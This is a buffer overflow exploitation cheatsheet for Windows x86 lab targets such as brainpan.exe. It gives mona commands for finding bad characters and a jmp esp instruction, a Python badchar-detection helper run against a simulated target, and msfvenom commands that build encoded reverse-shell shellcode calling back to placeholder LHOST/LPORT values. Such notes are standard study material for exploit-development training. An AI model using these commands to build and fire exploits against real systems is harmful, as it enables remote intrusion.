Buffer Overflow Cheatsheet
A handy list of the most typical commands used in buffer overflows.
Take control of EIP
First, let's use some skeleton scripts to overwrite EIP.
Then, let's generate a pattern to identify the offset.
Todo: complete msfpatterncreate command and msfpatternfind
After getting control of EIP
Set a working folder
!mona config -set workingfolder C:\Users\shroudri\%p
Generate bytearray
!mona bytearray
Generate bytearray excluding one or more badchars
!mona bytearray -cpb "\x00"
!mona bytearray -cpb "\x00\x0a..."
Compare ESP with generated bytearray to check for badchars automatically
!mona compare -f C:\Users\shroudri\%p\bytearray.bin -a <ESP_ADDRESS> # e.g. 00F23930
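The two mona steps above (building the bytearray and comparing it with what landed at ESP) written out in Python, as an added example that is not part of the original cheatsheet; the target is a constructed stand-in that mangles a couple of bytes, not a real program.

```python
# Added example: the badchar loop that "!mona bytearray -cpb" and
# "!mona compare" automate, in plain Python so the logic is visible.

def make_bytearray(exclude: bytes = b"") -> bytes:
    """0x00..0xFF with the excluded bytes removed, like !mona bytearray -cpb."""
    return bytes(b for b in range(256) if b not in exclude)


def first_badchar(expected: bytes, observed: bytes):
    """Compare the bytes that were sent with the bytes found at ESP.

    Returns the first byte that was altered or dropped, or None when the dump
    matches. Past a mangled byte the dump is usually shifted or truncated, so
    only the first mismatch is trustworthy: exclude it and send a fresh
    bytearray, which is also how the mona loop is used.
    """
    for i, byte in enumerate(expected):
        if i >= len(observed) or observed[i] != byte:
            return byte
    return None


def find_badchars(send_and_dump, exclude: bytes = b"") -> bytes:
    """Repeat send -> dump -> compare until the dump is clean.

    send_and_dump(payload) must return the bytes that ended up in memory.
    Returns the sorted set of bad characters, ready for the msfvenom -b flag.
    """
    bad = bytearray(exclude)
    while True:
        payload = make_bytearray(bytes(bad))
        culprit = first_badchar(payload, send_and_dump(payload))
        if culprit is None:
            return bytes(sorted(bad))
        bad.append(culprit)


def simulated_target(payload: bytes) -> bytes:
    """Constructed stand-in for the program under test (no real binary here):
    it stores the input as a C string, truncating at the first NUL byte, and
    converts line feeds (0x0a) into carriage returns (0x0d)."""
    return payload.split(b"\x00", 1)[0].replace(b"\x0a", b"\x0d")


if __name__ == "__main__":
    badchars = find_badchars(simulated_target)
    print("bad characters:", "".join(f"\\x{b:02x}" for b in badchars))
```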
Generate revshell with msfvenom
msfvenom -p windows/shell_reverse_tcp -a x86 -e x86/shikata_ga_nai -f c LHOST=insertip LPORT=insertport -b "\x00" EXITFUNC=thread
msfvenom -p windows/shell_reverse_tcp -a x86 -e x86/shikata_ga_nai -f c LHOST=insertip LPORT=insertport -b "\x00\x0a\xaf" EXITFUNC=thread
List all loaded modules (the program and its DLLs)
!mona modules
Next step: make EIP point to ESP
This command finds an instruction inside a module that jumps to ESP (FF E4 is the opcode for jmp esp)
!mona find -s "\xFF\xE4" -m brainpan.exe
Because shikata_ga_nai is being used (its decoder stub modifies the stack it sits on), a few NOPs must be placed between EIP and the shellcode
NOPS = "\x90" * 16